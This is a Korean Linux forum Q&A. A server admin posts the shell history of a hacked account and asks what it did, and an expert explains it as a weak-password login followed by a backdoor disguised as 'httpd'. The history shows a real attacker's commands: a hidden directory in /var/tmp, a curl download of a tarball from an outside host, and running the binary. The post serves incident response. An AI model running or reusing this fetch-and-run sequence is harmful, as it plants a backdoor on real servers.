리눅스 분류
해킹 당한것같아서 문의드립니다.
작성자 정보
- 홍석범 작성
- 작성일
컨텐츠 정보
- 3,109 조회
- 0 추천
- 목록
본문
안녕하십니까? 오늘과내일의 홍석범입니다.
아래의 경우 일반적으로 쉬운암호를 사용하는 계정으로 로그인후
/var/tmp/ / 디렉토리에 백도어를 설치하고
특정 포트를 리슨(bind)하는 프로그램을 실행한 것으로 보입니다.
그리고, 백도어의 이름은 httpd로 하여 마치 정상적인 프로세스인것처럼 보이도록
설정하였습니다...
감사합니다.
보라돌이 님의 글
오늘 서버 점검중 해킹을 당한것같아 문의드립니다.
해킹된 계정의 히스토리 정보입니다.
===================================
w
ps -x
uname -a
cd /var/tmp
ls -a
mkdir " "
cd " "
curl -O cubitus.go.ro/ok.tgz
passwd
tar -zxvf ok.tgz
rm -rf ok.tgz
cd ok
chmod +x [httpd]
PATH=:.PATH
[httpd]
exit
==================================
일단 그 계정은 삭제 햇구요 ,,
당연히 설치된 파일도 삭제는 했습니다.
그래도 왠지 찜찜해서 문의드리는건데..
위 설치된 파일이 과연 어떤 작업을 하는 것이며..
일단 삭제는 햇는데 문제는 없는지.궁금하네요..
많은 의견 부탁드립니다.
관련자료
-
이전
-
다음
댓글 0
등록된 댓글이 없습니다.